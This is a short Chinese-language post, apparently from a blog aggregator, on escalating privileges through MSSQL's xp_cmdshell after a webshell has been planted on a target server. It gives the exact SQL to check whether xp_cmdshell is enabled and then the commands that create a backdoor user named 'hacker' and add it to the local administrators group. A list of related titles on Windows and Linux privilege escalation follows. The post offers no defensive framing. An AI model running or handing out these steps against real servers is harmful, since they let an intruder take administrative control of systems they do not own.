mssqlserver xp_cmdshell提權
首先把大馬上傳上去,再webshell.asp上進行操作
進行埠掃描,發現有1433埠存在,說明有mssql資料庫
在sql操作命令處,進行輸入命令:select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell‘ 檢視xp_cmdshell是否開啟
新增系統賬號:exec master.dbo.xp_cmdshell 'net user hacker 123456 /add'
加入管理員組:exec master.dbo.xp_cmdshell 'net localgroup administrators hacker /add'
相關文章
- [提權禁區] SQL語句利用xp_cmdshell獲取許可權SQL
- SQL隱碼攻擊中利用XP_cmdshell提權的用法SQL
- 提權系列(二)----Windows Service 伺服器提權之Mssql提權,GetPass提權,hash提權,LPK提權Windows伺服器SQL
- 內網滲透之——mssql資料庫提權之——xp_cmdshell執行系統命令內網SQL資料庫
- Linux提權————利用SUID提權LinuxUI
- Windows提權實戰——————3、PcAnyWhere提權WindowsPCA
- [提權禁區]1433埠入侵提權
- SQL Sever提權SQL
- Linux 提權Linux
- mysql UDF提權MySql
- 利用for命令提權
- Windows提權實戰——————1、IIS6.exe提權實戰Windows
- Windows提權總結Windows
- Powershell 提權框架-Powerup框架
- Windows提權系列————上篇Windows
- Windows提權系列————下篇Windows
- Linux提權-許可權升級Linux
- Linux提權————Linux下三種不同方式的提權技巧Linux
- Potato家族本地提權分析
- 提權學習筆記筆記
- Windows PrintDemon提權漏洞分析Windows
- Linux-SUID提權LinuxUI
- mysql提權之mof詳解MySql
- 最全的伺服器提權伺服器
- Windows提權基本原理Windows
- SP_OACreate提權經驗
- Sa提權Sql語句大全SQL
- 借用UAC完成的提權思路分享
- 滲透之——資料庫提權資料庫
- linux 普通使用者提權Linux
- Windows提權實戰————4、DLL注入Windows
- Linux、Windows提權命令速記LinuxWindows
- Java實現平滑加權輪詢演算法--降權和提權Java演算法
- MySQL資料庫Root許可權MOF方法提權研究MySql資料庫
- 利用Xp_Cmdshell取得伺服器的管理權,很可怕的SQL隱碼攻擊伺服器SQL
- metaspolit下UAC提權以及日誌清除
- 滲透測試——提權方式總結
- Linux使用者提權管理方案Linux